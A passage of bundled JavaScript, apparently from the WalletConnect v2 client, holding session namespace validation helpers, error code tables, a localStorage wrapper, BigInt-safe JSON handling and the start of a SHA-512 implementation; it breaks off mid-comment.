        n.push(`${r}:${o}`);
    }), n;
}
function $a5d33cfc7f8e5437$export$fb6db6038e742b14(e) {
    const n = [];
    return Object.values(e).forEach((t)=>{
        n.push(...$a5d33cfc7f8e5437$export$d46695d9c3664fe9(t.accounts));
    }), n;
}
function $a5d33cfc7f8e5437$export$7dcf4808e17b15ac(e, n) {
    const t = [];
    return Object.values(e).forEach((r)=>{
        $a5d33cfc7f8e5437$export$d46695d9c3664fe9(r.accounts).includes(n) && t.push(...r.methods);
    }), t;
}
function $a5d33cfc7f8e5437$export$94ee6d00e384a22(e, n) {
    const t = [];
    return Object.values(e).forEach((r)=>{
        $a5d33cfc7f8e5437$export$d46695d9c3664fe9(r.accounts).includes(n) && t.push(...r.events);
    }), t;
}
function $a5d33cfc7f8e5437$export$a8daa26a7c60ef90(e, n) {
    const t = $a5d33cfc7f8e5437$export$93f7b81dc815a714(e, n);
    if (t) throw new Error(t.message);
    const r = {};
    for (const [o, s] of Object.entries(e))r[o] = {
        methods: s.methods,
        events: s.events,
        chains: s.accounts.map((i)=>`${i.split(":")[0]}:${i.split(":")[1]}`)
    };
    return r;
}
function $a5d33cfc7f8e5437$export$c0b86bc9b7d9f338(e) {
    const { proposal: { requiredNamespaces: n, optionalNamespaces: t = {} }, supportedNamespaces: r } = e, o = $a5d33cfc7f8e5437$export$2994550cda701c96(n), s = $a5d33cfc7f8e5437$export$2994550cda701c96(t), i = {};
    Object.keys(r).forEach((c)=>{
        const u = r[c].chains, a = r[c].methods, g = r[c].events, P = r[c].accounts;
        u.forEach((m)=>{
            if (!P.some((f)=>f.includes(m))) throw new Error(`No accounts provided for chain ${m} in namespace ${c}`);
        }), i[c] = {
            chains: u,
            methods: a,
            events: g,
            accounts: P
        };
    });
    const d = $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4(n, i, "approve()");
    if (d) throw new Error(d.message);
    const l = {};
    return !Object.keys(n).length && !Object.keys(t).length ? i : (Object.keys(o).forEach((c)=>{
        const u = r[c].chains.filter((m)=>{
            var f, h;
            return (h = (f = o[c]) == null ? void 0 : f.chains) == null ? void 0 : h.includes(m);
        }), a = r[c].methods.filter((m)=>{
            var f, h;
            return (h = (f = o[c]) == null ? void 0 : f.methods) == null ? void 0 : h.includes(m);
        }), g = r[c].events.filter((m)=>{
            var f, h;
            return (h = (f = o[c]) == null ? void 0 : f.events) == null ? void 0 : h.includes(m);
        }), P = u.map((m)=>r[c].accounts.filter((f)=>f.includes(`${m}:`))).flat();
        l[c] = {
            chains: u,
            methods: a,
            events: g,
            accounts: P
        };
    }), Object.keys(s).forEach((c)=>{
        var u, a, g, P, m, f;
        if (!r[c]) return;
        const h = (a = (u = s[c]) == null ? void 0 : u.chains) == null ? void 0 : a.filter((T)=>r[c].chains.includes(T)), dn = r[c].methods.filter((T)=>{
            var w, _;
            return (_ = (w = s[c]) == null ? void 0 : w.methods) == null ? void 0 : _.includes(T);
        }), ln = r[c].events.filter((T)=>{
            var w, _;
            return (_ = (w = s[c]) == null ? void 0 : w.events) == null ? void 0 : _.includes(T);
        }), fn = h?.map((T)=>r[c].accounts.filter((w)=>w.includes(`${T}:`))).flat();
        l[c] = {
            chains: $a5d33cfc7f8e5437$export$9826fe7ad3921016((g = l[c]) == null ? void 0 : g.chains, h),
            methods: $a5d33cfc7f8e5437$export$9826fe7ad3921016((P = l[c]) == null ? void 0 : P.methods, dn),
            events: $a5d33cfc7f8e5437$export$9826fe7ad3921016((m = l[c]) == null ? void 0 : m.events, ln),
            accounts: $a5d33cfc7f8e5437$export$9826fe7ad3921016((f = l[c]) == null ? void 0 : f.accounts, fn)
        };
    }), l);
}
function $a5d33cfc7f8e5437$export$e03e993df4723bde(e) {
    return e.includes(":");
}
function $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8(e) {
    return $a5d33cfc7f8e5437$export$e03e993df4723bde(e) ? e.split(":")[0] : e;
}
function $a5d33cfc7f8e5437$export$2994550cda701c96(e) {
    var n, t, r;
    const o = {};
    if (!$a5d33cfc7f8e5437$export$16a0268bc22b47b0(e)) return o;
    for (const [s, i] of Object.entries(e)){
        const d = $a5d33cfc7f8e5437$export$e03e993df4723bde(s) ? [
            s
        ] : i.chains, l = i.methods || [], c = i.events || [], u = $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8(s);
        o[u] = $a5d33cfc7f8e5437$var$Ot($a5d33cfc7f8e5437$var$Nt({}, o[u]), {
            chains: $a5d33cfc7f8e5437$export$9826fe7ad3921016(d, (n = o[u]) == null ? void 0 : n.chains),
            methods: $a5d33cfc7f8e5437$export$9826fe7ad3921016(l, (t = o[u]) == null ? void 0 : t.methods),
            events: $a5d33cfc7f8e5437$export$9826fe7ad3921016(c, (r = o[u]) == null ? void 0 : r.events)
        });
    }
    return o;
}
const $a5d33cfc7f8e5437$var$Pt = {
    INVALID_METHOD: {
        message: "Invalid method.",
        code: 1001
    },
    INVALID_EVENT: {
        message: "Invalid event.",
        code: 1002
    },
    INVALID_UPDATE_REQUEST: {
        message: "Invalid update request.",
        code: 1003
    },
    INVALID_EXTEND_REQUEST: {
        message: "Invalid extend request.",
        code: 1004
    },
    INVALID_SESSION_SETTLE_REQUEST: {
        message: "Invalid session settle request.",
        code: 1005
    },
    UNAUTHORIZED_METHOD: {
        message: "Unauthorized method.",
        code: 3001
    },
    UNAUTHORIZED_EVENT: {
        message: "Unauthorized event.",
        code: 3002
    },
    UNAUTHORIZED_UPDATE_REQUEST: {
        message: "Unauthorized update request.",
        code: 3003
    },
    UNAUTHORIZED_EXTEND_REQUEST: {
        message: "Unauthorized extend request.",
        code: 3004
    },
    USER_REJECTED: {
        message: "User rejected.",
        code: 5e3
    },
    USER_REJECTED_CHAINS: {
        message: "User rejected chains.",
        code: 5001
    },
    USER_REJECTED_METHODS: {
        message: "User rejected methods.",
        code: 5002
    },
    USER_REJECTED_EVENTS: {
        message: "User rejected events.",
        code: 5003
    },
    UNSUPPORTED_CHAINS: {
        message: "Unsupported chains.",
        code: 5100
    },
    UNSUPPORTED_METHODS: {
        message: "Unsupported methods.",
        code: 5101
    },
    UNSUPPORTED_EVENTS: {
        message: "Unsupported events.",
        code: 5102
    },
    UNSUPPORTED_ACCOUNTS: {
        message: "Unsupported accounts.",
        code: 5103
    },
    UNSUPPORTED_NAMESPACE_KEY: {
        message: "Unsupported namespace key.",
        code: 5104
    },
    USER_DISCONNECTED: {
        message: "User disconnected.",
        code: 6e3
    },
    SESSION_SETTLEMENT_FAILED: {
        message: "Session settlement failed.",
        code: 7e3
    },
    WC_METHOD_UNSUPPORTED: {
        message: "Unsupported wc_ method.",
        code: 10001
    }
}, $a5d33cfc7f8e5437$var$Tt = {
    NOT_INITIALIZED: {
        message: "Not initialized.",
        code: 1
    },
    NO_MATCHING_KEY: {
        message: "No matching key.",
        code: 2
    },
    RESTORE_WILL_OVERRIDE: {
        message: "Restore will override.",
        code: 3
    },
    RESUBSCRIBED: {
        message: "Resubscribed.",
        code: 4
    },
    MISSING_OR_INVALID: {
        message: "Missing or invalid.",
        code: 5
    },
    EXPIRED: {
        message: "Expired.",
        code: 6
    },
    UNKNOWN_TYPE: {
        message: "Unknown type.",
        code: 7
    },
    MISMATCHED_TOPIC: {
        message: "Mismatched topic.",
        code: 8
    },
    NON_CONFORMING_NAMESPACES: {
        message: "Non conforming namespaces.",
        code: 9
    }
};
function $a5d33cfc7f8e5437$export$500d4c4a8fafe35(e, n) {
    const { message: t, code: r } = $a5d33cfc7f8e5437$var$Tt[e];
    return {
        message: n ? `${t} ${n}` : t,
        code: r
    };
}
function $a5d33cfc7f8e5437$export$8203ef1531c8b5b5(e, n) {
    const { message: t, code: r } = $a5d33cfc7f8e5437$var$Pt[e];
    return {
        message: n ? `${t} ${n}` : t,
        code: r
    };
}
function $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e, n) {
    return Array.isArray(e) ? typeof n < "u" && e.length ? e.every(n) : !0 : !1;
}
function $a5d33cfc7f8e5437$export$16a0268bc22b47b0(e) {
    return Object.getPrototypeOf(e) === Object.prototype && Object.keys(e).length;
}
function $a5d33cfc7f8e5437$export$fce6876652108ab(e) {
    return typeof e > "u";
}
function $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, n) {
    return n && $a5d33cfc7f8e5437$export$fce6876652108ab(e) ? !0 : typeof e == "string" && !!e.trim().length;
}
function $a5d33cfc7f8e5437$export$d6781b696a0576d1(e, n) {
    return n && $a5d33cfc7f8e5437$export$fce6876652108ab(e) ? !0 : typeof e == "number" && !isNaN(e);
}
function $a5d33cfc7f8e5437$export$6fc4971bf8f326a(e, n) {
    const { requiredNamespaces: t } = n, r = Object.keys(e.namespaces), o = Object.keys(t);
    let s = !0;
    return $a5d33cfc7f8e5437$export$1468a49de573f7f9(o, r) ? (r.forEach((i)=>{
        const { accounts: d, methods: l, events: c } = e.namespaces[i], u = $a5d33cfc7f8e5437$export$d46695d9c3664fe9(d), a = t[i];
        (!$a5d33cfc7f8e5437$export$1468a49de573f7f9($a5d33cfc7f8e5437$export$376384387cd15b27(i, a), u) || !$a5d33cfc7f8e5437$export$1468a49de573f7f9(a.methods, l) || !$a5d33cfc7f8e5437$export$1468a49de573f7f9(a.events, c)) && (s = !1);
    }), s) : !1;
}
function $a5d33cfc7f8e5437$export$e544b39f0a22e47a(e) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, !1) && e.includes(":") ? e.split(":").length === 2 : !1;
}
function $a5d33cfc7f8e5437$export$49e4a5b6862e3c71(e) {
    if ($a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, !1) && e.includes(":")) {
        const n = e.split(":");
        if (n.length === 3) {
            const t = n[0] + ":" + n[1];
            return !!n[2] && $a5d33cfc7f8e5437$export$e544b39f0a22e47a(t);
        }
    }
    return !1;
}
function $a5d33cfc7f8e5437$export$bef94a5618bf18bf(e) {
    if ($a5d33cfc7f8e5437$export$ee898ca48ab56c74(e, !1)) try {
        return typeof new URL(e) < "u";
    } catch  {
        return !1;
    }
    return !1;
}
function $a5d33cfc7f8e5437$export$f657f7976bb2769d(e) {
    var n;
    return (n = e?.proposer) == null ? void 0 : n.publicKey;
}
function $a5d33cfc7f8e5437$export$c96d5113768aaf5e(e) {
    return e?.topic;
}
function $a5d33cfc7f8e5437$export$5e1c5c89613c213f(e, n) {
    let t = null;
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e?.publicKey, !1) || (t = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("MISSING_OR_INVALID", `${n} controller public key should be a string`)), t;
}
function $a5d33cfc7f8e5437$export$c12fced8176774f3(e) {
    let n = !0;
    return $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e) ? e.length && (n = e.every((t)=>$a5d33cfc7f8e5437$export$ee898ca48ab56c74(t, !1))) : n = !1, n;
}
function $a5d33cfc7f8e5437$export$df46c123d7e298ce(e, n, t) {
    let r = null;
    return $a5d33cfc7f8e5437$export$41dd3d480aac4a71(n) && n.length ? n.forEach((o)=>{
        r || $a5d33cfc7f8e5437$export$e544b39f0a22e47a(o) || (r = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_CHAINS", `${t}, chain ${o} should be a string and conform to "namespace:chainId" format`));
    }) : $a5d33cfc7f8e5437$export$e544b39f0a22e47a(e) || (r = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_CHAINS", `${t}, chains must be defined as "namespace:chainId" e.g. "eip155:1": {...} in the namespace key OR as an array of CAIP-2 chainIds e.g. eip155: { chains: ["eip155:1", "eip155:5"] }`)), r;
}
function $a5d33cfc7f8e5437$export$94ae96fb66f29e08(e, n, t) {
    let r = null;
    return Object.entries(e).forEach(([o, s])=>{
        if (r) return;
        const i = $a5d33cfc7f8e5437$export$df46c123d7e298ce(o, $a5d33cfc7f8e5437$export$376384387cd15b27(o, s), `${n} ${t}`);
        i && (r = i);
    }), r;
}
function $a5d33cfc7f8e5437$export$d5644026aaffb9e7(e, n) {
    let t = null;
    return $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e) ? e.forEach((r)=>{
        t || $a5d33cfc7f8e5437$export$49e4a5b6862e3c71(r) || (t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_ACCOUNTS", `${n}, account ${r} should be a string and conform to "namespace:chainId:address" format`));
    }) : t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_ACCOUNTS", `${n}, accounts should be an array of strings conforming to "namespace:chainId:address" format`), t;
}
function $a5d33cfc7f8e5437$export$2a2012e7bfa1cfb4(e, n) {
    let t = null;
    return Object.values(e).forEach((r)=>{
        if (t) return;
        const o = $a5d33cfc7f8e5437$export$d5644026aaffb9e7(r?.accounts, `${n} namespace`);
        o && (t = o);
    }), t;
}
function $a5d33cfc7f8e5437$export$b32541d63753af56(e, n) {
    let t = null;
    return $a5d33cfc7f8e5437$export$c12fced8176774f3(e?.methods) ? $a5d33cfc7f8e5437$export$c12fced8176774f3(e?.events) || (t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_EVENTS", `${n}, events should be an array of strings or empty array for no events`)) : t = $a5d33cfc7f8e5437$export$8203ef1531c8b5b5("UNSUPPORTED_METHODS", `${n}, methods should be an array of strings or empty array for no methods`), t;
}
function $a5d33cfc7f8e5437$export$27682c78deeca9d7(e, n) {
    let t = null;
    return Object.values(e).forEach((r)=>{
        if (t) return;
        const o = $a5d33cfc7f8e5437$export$b32541d63753af56(r, `${n}, namespace`);
        o && (t = o);
    }), t;
}
function $a5d33cfc7f8e5437$export$9e2b2cae22c6a8b3(e, n, t) {
    let r = null;
    if (e && $a5d33cfc7f8e5437$export$16a0268bc22b47b0(e)) {
        const o = $a5d33cfc7f8e5437$export$27682c78deeca9d7(e, n);
        o && (r = o);
        const s = $a5d33cfc7f8e5437$export$94ae96fb66f29e08(e, n, t);
        s && (r = s);
    } else r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("MISSING_OR_INVALID", `${n}, ${t} should be an object with data`);
    return r;
}
function $a5d33cfc7f8e5437$export$93f7b81dc815a714(e, n) {
    let t = null;
    if (e && $a5d33cfc7f8e5437$export$16a0268bc22b47b0(e)) {
        const r = $a5d33cfc7f8e5437$export$27682c78deeca9d7(e, n);
        r && (t = r);
        const o = $a5d33cfc7f8e5437$export$2a2012e7bfa1cfb4(e, n);
        o && (t = o);
    } else t = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("MISSING_OR_INVALID", `${n}, namespaces should be an object with data`);
    return t;
}
function $a5d33cfc7f8e5437$export$1b3fc298be8c9a7b(e) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.protocol, !0);
}
function $a5d33cfc7f8e5437$export$6294c30b976bd21e(e, n) {
    let t = !1;
    return n && !e ? t = !0 : e && $a5d33cfc7f8e5437$export$41dd3d480aac4a71(e) && e.length && e.forEach((r)=>{
        t = $a5d33cfc7f8e5437$export$1b3fc298be8c9a7b(r);
    }), t;
}
function $a5d33cfc7f8e5437$export$53551be28ad5e34d(e) {
    return typeof e == "number";
}
function $a5d33cfc7f8e5437$export$b3f5fcca1d210454(e) {
    return typeof e < "u" && true;
}
function $a5d33cfc7f8e5437$export$766fe78377d96f2a(e) {
    return !(!e || typeof e != "object" || !e.code || !$a5d33cfc7f8e5437$export$d6781b696a0576d1(e.code, !1) || !e.message || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.message, !1));
}
function $a5d33cfc7f8e5437$export$1a2af3c017fb6d42(e) {
    return !($a5d33cfc7f8e5437$export$fce6876652108ab(e) || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.method, !1));
}
function $a5d33cfc7f8e5437$export$1ae38cf0a848f651(e) {
    return !($a5d33cfc7f8e5437$export$fce6876652108ab(e) || $a5d33cfc7f8e5437$export$fce6876652108ab(e.result) && $a5d33cfc7f8e5437$export$fce6876652108ab(e.error) || !$a5d33cfc7f8e5437$export$d6781b696a0576d1(e.id, !1) || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.jsonrpc, !1));
}
function $a5d33cfc7f8e5437$export$cbe4cdc5960cfa11(e) {
    return !($a5d33cfc7f8e5437$export$fce6876652108ab(e) || !$a5d33cfc7f8e5437$export$ee898ca48ab56c74(e.name, !1));
}
function $a5d33cfc7f8e5437$export$144fc36610eb6522(e, n) {
    return !(!$a5d33cfc7f8e5437$export$e544b39f0a22e47a(n) || !$a5d33cfc7f8e5437$export$fb6db6038e742b14(e).includes(n));
}
function $a5d33cfc7f8e5437$export$8db4804e3a6de711(e, n, t) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(t, !1) ? $a5d33cfc7f8e5437$export$7dcf4808e17b15ac(e, n).includes(t) : !1;
}
function $a5d33cfc7f8e5437$export$df2c67ef8baad16b(e, n, t) {
    return $a5d33cfc7f8e5437$export$ee898ca48ab56c74(t, !1) ? $a5d33cfc7f8e5437$export$94ee6d00e384a22(e, n).includes(t) : !1;
}
function $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4(e, n, t) {
    let r = null;
    const o = $a5d33cfc7f8e5437$var$Ht(e), s = $a5d33cfc7f8e5437$var$qt(n), i = Object.keys(o), d = Object.keys(s), l = $a5d33cfc7f8e5437$var$un(Object.keys(e)), c = $a5d33cfc7f8e5437$var$un(Object.keys(n)), u = l.filter((a)=>!c.includes(a));
    return u.length && (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces keys don't satisfy requiredNamespaces.
      Required: ${u.toString()}
      Received: ${Object.keys(n).toString()}`)), $a5d33cfc7f8e5437$export$1468a49de573f7f9(i, d) || (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces chains don't satisfy required namespaces.
      Required: ${i.toString()}
      Approved: ${d.toString()}`)), Object.keys(n).forEach((a)=>{
        if (!a.includes(":") || r) return;
        const g = $a5d33cfc7f8e5437$export$d46695d9c3664fe9(n[a].accounts);
        g.includes(a) || (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces accounts don't satisfy namespace accounts for ${a}
        Required: ${a}
        Approved: ${g.toString()}`));
    }), i.forEach((a)=>{
        r || ($a5d33cfc7f8e5437$export$1468a49de573f7f9(o[a].methods, s[a].methods) ? $a5d33cfc7f8e5437$export$1468a49de573f7f9(o[a].events, s[a].events) || (r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces events don't satisfy namespace events for ${a}`)) : r = $a5d33cfc7f8e5437$export$500d4c4a8fafe35("NON_CONFORMING_NAMESPACES", `${t} namespaces methods don't satisfy namespace methods for ${a}`));
    }), r;
}
function $a5d33cfc7f8e5437$var$Ht(e) {
    const n = {};
    return Object.keys(e).forEach((t)=>{
        var r;
        t.includes(":") ? n[t] = e[t] : (r = e[t].chains) == null || r.forEach((o)=>{
            n[o] = {
                methods: e[t].methods,
                events: e[t].events
            };
        });
    }), n;
}
function $a5d33cfc7f8e5437$var$un(e) {
    return [
        ...new Set(e.map((n)=>n.includes(":") ? n.split(":")[0] : n))
    ];
}
function $a5d33cfc7f8e5437$var$qt(e) {
    const n = {};
    return Object.keys(e).forEach((t)=>{
        if (t.includes(":")) n[t] = e[t];
        else {
            const r = $a5d33cfc7f8e5437$export$d46695d9c3664fe9(e[t].accounts);
            r?.forEach((o)=>{
                n[o] = {
                    accounts: e[t].accounts.filter((s)=>s.includes(`${o}:`)),
                    methods: e[t].methods,
                    events: e[t].events
                };
            });
        }
    }), n;
}
function $a5d33cfc7f8e5437$export$59fba2af1ac782b(e, n) {
    return $a5d33cfc7f8e5437$export$d6781b696a0576d1(e, !1) && e <= n.max && e >= n.min;
}



var $7etJZ = parcelRequire("7etJZ");
var $62fc2f1c5fb46a11$exports = {};
"use strict";
Object.defineProperty($62fc2f1c5fb46a11$exports, "__esModule", {
    value: true
});
$62fc2f1c5fb46a11$exports.KeyValueStorage = void 0;

var $7WQrb = parcelRequire("7WQrb");

var $lT07n = parcelRequire("lT07n");

const $62fc2f1c5fb46a11$var$localStorage_1 = $7WQrb.__importDefault((parcelRequire("bKt7V")));
var $b43df25cddcbdec8$exports = {};
"use strict";
Object.defineProperty($b43df25cddcbdec8$exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("57Lgo")), $b43df25cddcbdec8$exports);

$7WQrb.__exportStar((parcelRequire("3ycQJ")), $b43df25cddcbdec8$exports);


class $62fc2f1c5fb46a11$var$KeyValueStorage {
    constructor(){
        this.localStorage = $62fc2f1c5fb46a11$var$localStorage_1.default;
    }
    getKeys() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            return Object.keys(this.localStorage);
        });
    }
    getEntries() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            return Object.entries(this.localStorage).map($b43df25cddcbdec8$exports.parseEntry);
        });
    }
    getItem(key) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            const item = this.localStorage.getItem(key);
            if (item === null) return undefined;
            return $lT07n.safeJsonParse(item);
        });
    }
    setItem(key, value) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            this.localStorage.setItem(key, $lT07n.safeJsonStringify(value));
        });
    }
    removeItem(key) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            this.localStorage.removeItem(key);
        });
    }
}
$62fc2f1c5fb46a11$exports.KeyValueStorage = $62fc2f1c5fb46a11$var$KeyValueStorage;
$62fc2f1c5fb46a11$exports.default = $62fc2f1c5fb46a11$var$KeyValueStorage;


var $212993b948b3fe4b$exports = {};
"use strict";
Object.defineProperty($212993b948b3fe4b$exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("48YDT")), $212993b948b3fe4b$exports);

$7WQrb.__exportStar((parcelRequire("5nu18")), $212993b948b3fe4b$exports);

$7WQrb.__exportStar((parcelRequire("1nGZv")), $212993b948b3fe4b$exports);


var $7fc0ce2591a9daef$exports = {};
"use strict";
Object.defineProperty($7fc0ce2591a9daef$exports, "__esModule", {
    value: true
});
$7fc0ce2591a9daef$exports.pino = void 0;

var $7WQrb = parcelRequire("7WQrb");

const $7fc0ce2591a9daef$var$pino_1 = $7WQrb.__importDefault((parcelRequire("kgxrf")));
Object.defineProperty($7fc0ce2591a9daef$exports, "pino", {
    enumerable: true,
    get: function() {
        return $7fc0ce2591a9daef$var$pino_1.default;
    }
});

$7WQrb.__exportStar((parcelRequire("glyO2")), $7fc0ce2591a9daef$exports);

$7WQrb.__exportStar((parcelRequire("cyyD4")), $7fc0ce2591a9daef$exports);


parcelRequire("37EVq");
var $3VSyk = parcelRequire("3VSyk");

var $7etJZ = parcelRequire("7etJZ");
class $bace94c1ef08d1bc$export$ed533416df113881 extends (0, $3VSyk.IEvents) {
    constructor(s){
        super(), this.opts = s, this.protocol = "wc", this.version = 2;
    }
}
class $bace94c1ef08d1bc$export$a4e7e56f03915894 {
    constructor(s, t, o){
        this.core = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$45b2c2643615b67 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.core = s, this.logger = t, this.records = new Map;
    }
}
class $bace94c1ef08d1bc$export$e67570fe0a885c47 {
    constructor(s, t){
        this.logger = s, this.core = t;
    }
}
class $bace94c1ef08d1bc$export$3b0872bbd7e675a2 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.relayer = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$9a0f755fd4f79434 extends (0, $3VSyk.IEvents) {
    constructor(s){
        super();
    }
}
class $bace94c1ef08d1bc$export$a7f17ba6c54777e7 {
    constructor(s, t, o, w){
        this.core = s, this.logger = t, this.name = o;
    }
}
class $bace94c1ef08d1bc$export$5746ea6dad01660a {
    constructor(){
        this.map = new Map;
    }
}
class $bace94c1ef08d1bc$export$300eed987e764b57 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.relayer = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$be56d986c75c3691 {
    constructor(s, t){
        this.core = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$41aaa3c39f6f2861 extends (0, $3VSyk.IEvents) {
    constructor(s, t){
        super(), this.core = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$d6c2d698ffb743f1 {
    constructor(s, t){
        this.logger = s, this.core = t;
    }
}
class $bace94c1ef08d1bc$export$873b0b865d85ddb6 {
    constructor(s, t){
        this.projectId = s, this.logger = t;
    }
}
class $bace94c1ef08d1bc$export$235ef727e8a26483 extends (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))) {
    constructor(){
        super();
    }
}
class $bace94c1ef08d1bc$export$2ebcf6eeacedad44 {
    constructor(s){
        this.opts = s, this.protocol = "wc", this.version = 2;
    }
}
class $bace94c1ef08d1bc$export$623dd0f793f15643 extends (0, $7etJZ.EventEmitter) {
    constructor(){
        super();
    }
}
class $bace94c1ef08d1bc$export$87df43c730effa30 {
    constructor(s){
        this.client = s;
    }
}


const $81c2e06d24b89184$var$JSONStringify = (data)=>JSON.stringify(data, (_, value)=>typeof value === "bigint" ? value.toString() + "n" : value);
const $81c2e06d24b89184$var$JSONParse = (json)=>{
    const numbersBiggerThanMaxInt = /([\[:])?(\d{17,}|(?:[9](?:[1-9]07199254740991|0[1-9]7199254740991|00[8-9]199254740991|007[2-9]99254740991|007199[3-9]54740991|0071992[6-9]4740991|00719925[5-9]740991|007199254[8-9]40991|0071992547[5-9]0991|00719925474[1-9]991|00719925474099[2-9])))([,\}\]])/g;
    const serializedData = json.replace(numbersBiggerThanMaxInt, '$1"$2n"$3');
    return JSON.parse(serializedData, (_, value)=>{
        const isCustomFormatBigInt = typeof value === "string" && value.match(/^\d+n$/);
        if (isCustomFormatBigInt) return BigInt(value.substring(0, value.length - 1));
        return value;
    });
};
function $81c2e06d24b89184$export$84137bb44359aed5(value) {
    if (typeof value !== "string") throw new Error(`Cannot safe json parse value of type ${typeof value}`);
    try {
        return $81c2e06d24b89184$var$JSONParse(value);
    } catch (_a) {
        return value;
    }
}
function $81c2e06d24b89184$export$abc3f407e87918a4(value) {
    return typeof value === "string" ? value : $81c2e06d24b89184$var$JSONStringify(value) || "";
}


var $b9995ea5f865dc88$exports = {};
$parcel$export($b9995ea5f865dc88$exports, "generateKeyPair", () => $2281914794d9e636$export$a949d36eab55b41f);
$parcel$export($b9995ea5f865dc88$exports, "signJWT", () => $2281914794d9e636$export$a8dda30659d36d45);
$parcel$export($b9995ea5f865dc88$exports, "encodeIss", () => $f6e90d472e8dfc29$export$1b29ef9371459e10);
var $a1d7ebd43ba0a83c$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($a1d7ebd43ba0a83c$exports, "__esModule", {
    value: true
});
$a1d7ebd43ba0a83c$exports.convertSecretKeyToX25519 = $a1d7ebd43ba0a83c$exports.convertPublicKeyToX25519 = $a1d7ebd43ba0a83c$exports.verify = $a1d7ebd43ba0a83c$exports.sign = $a1d7ebd43ba0a83c$exports.extractPublicKeyFromSecretKey = $a1d7ebd43ba0a83c$exports.generateKeyPair = $a1d7ebd43ba0a83c$exports.generateKeyPairFromSeed = $a1d7ebd43ba0a83c$exports.SEED_LENGTH = $a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH = $a1d7ebd43ba0a83c$exports.PUBLIC_KEY_LENGTH = $a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH = void 0;

var $2cc6b12a8ccb780d$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($2cc6b12a8ccb780d$exports, "__esModule", {
    value: true
});


$2cc6b12a8ccb780d$exports.DIGEST_LENGTH = 64;
$2cc6b12a8ccb780d$exports.BLOCK_SIZE = 128;
/**
 * SHA-2-512 cryptographic hash algorithm.
 */ var $2cc6b12a8ccb780d$var$SHA512 = /** @class */ function() {
    function SHA512() {
        /** Length of hash output */ this.digestLength = $2cc6b12a8ccb780d$exports.DIGEST_LENGTH;
        /** Block size */ this.blockSize = $2cc6b12a8ccb780d$exports.BLOCK_SIZE;
        // Note: Int32Array is used instead of Uint32Array for performance reasons.
        this._stateHi = new Int32Array(8); // hash state, high bytes
        this._stateLo = new Int32Array(8); // hash state, low bytes
        this._tempHi = new Int32Array(16); // temporary state, high bytes
        this._tempLo = new Int32Array(16); // temporary state, low bytes
        this._buffer = new Uint8Array(256); // buffer for data to hash
        this._bufferLength = 0; // number of bytes in buffer
        this._bytesHashed = 0; // number of total bytes hashed
        this._finished = false; // indicates whether the hash was finalized
        this.reset();
    }
    SHA512.prototype._initState = function() {
        this._stateHi[0] = 0x6a09e667;
        this._stateHi[1] = 0xbb67ae85;
        this._stateHi[2] = 0x3c6ef372;
        this._stateHi[3] = 0xa54ff53a;
        this._stateHi[4] = 0x510e527f;
        this._stateHi[5] = 0x9b05688c;
        this._stateHi[6] = 0x1f83d9ab;
        this._stateHi[7] = 0x5be0cd19;
        this._stateLo[0] = 0xf3bcc908;
        this._stateLo[1] = 0x84caa73b;
        this._stateLo[2] = 0xfe94f82b;
        this._stateLo[3] = 0x5f1d36f1;
        this._stateLo[4] = 0xade682d1;
        this._stateLo[5] = 0x2b3e6c1f;
        this._stateLo[6] = 0xfb41bd6b;
        this._stateLo[7] = 0x137e2179;
    };
    /**
     * Resets hash state making it possible
     * to re-use this instance to hash other data.
